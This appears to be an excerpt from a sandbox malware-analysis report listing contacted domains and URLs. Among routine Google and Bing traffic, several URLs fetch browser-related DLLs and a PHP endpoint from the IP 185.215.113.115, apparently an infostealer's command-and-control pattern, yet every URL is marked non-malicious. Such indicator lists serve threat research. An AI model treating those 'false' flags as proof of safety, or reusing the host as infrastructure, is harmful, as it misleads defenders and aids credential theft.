192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
plus.l.google.com 142.250.185.110 true
play.google.com 142.250.185.174 true
www.google.com 142.250.185.68 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://tse1.mm.bing.net/th?id=OADD2.10239385917469_1PJ7CJICMRWKJR5SF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 false
    		high
    https://tse1.mm.bing.net/th?id=OADD2.10239400678274_1AGJJ9P2O7V6V1431&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 false
      		high
      http://185.215.113.115/68b591d6548ec281/msvcp140.dll false
        		high
        https://tse1.mm.bing.net/th?id=OADD2.10239400678275_1MGQ4V998SN0MOXXU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 false
          		high
          185.215.113.115/c4becf79229cb002.php false
            		high
            http://185.215.113.115/68b591d6548ec281/vcruntime140.dll false
              		high
              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
                		high
                https://tse1.mm.bing.net/th?id=OADD2.10239385917470_1O4L0U46N29EF81I2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 false
                  		high
                  http://185.215.113.115/ false
                    		high
                    https://tse1.mm.bing.net/th?id=OADD2.10239354941422_128KB82EECTAVENHE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 false
                      		high
                      https://www.google.com/async/newtab_promos false
                        		high
                        http://185.215.113.115/68b591d6548ec281/freebl3.dll false
                          		high
                          http://185.215.113.115/68b591d6548ec281/nss3.dll false
                            		high
                            https://www.google.com/async/ddljson?async=ntp:2 false
                              		high
                              https://play.google.com/log?format=json&hasfast=true false
                                		high
                                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
                                  		high
                                  https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 false
                                    		high
                                    http://185.215.113.115/68b591d6548ec281/softokn3.dll false
                                      		high
                                      http://185.215.113.115/c4becf79229cb002.php false
                                        		high
                                        http://185.215.113.115/68b591d6548ec281/sqlite3.dll false
                                          		high
                                          http://185.215.113.115/68b591d6548ec281/mozglue.dll false
                                            		high
                                            https://tse1.mm.bing.net/th?id=OADD2.10239354941421_1QFMKZTDAH37OHMPJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 false
                                              		high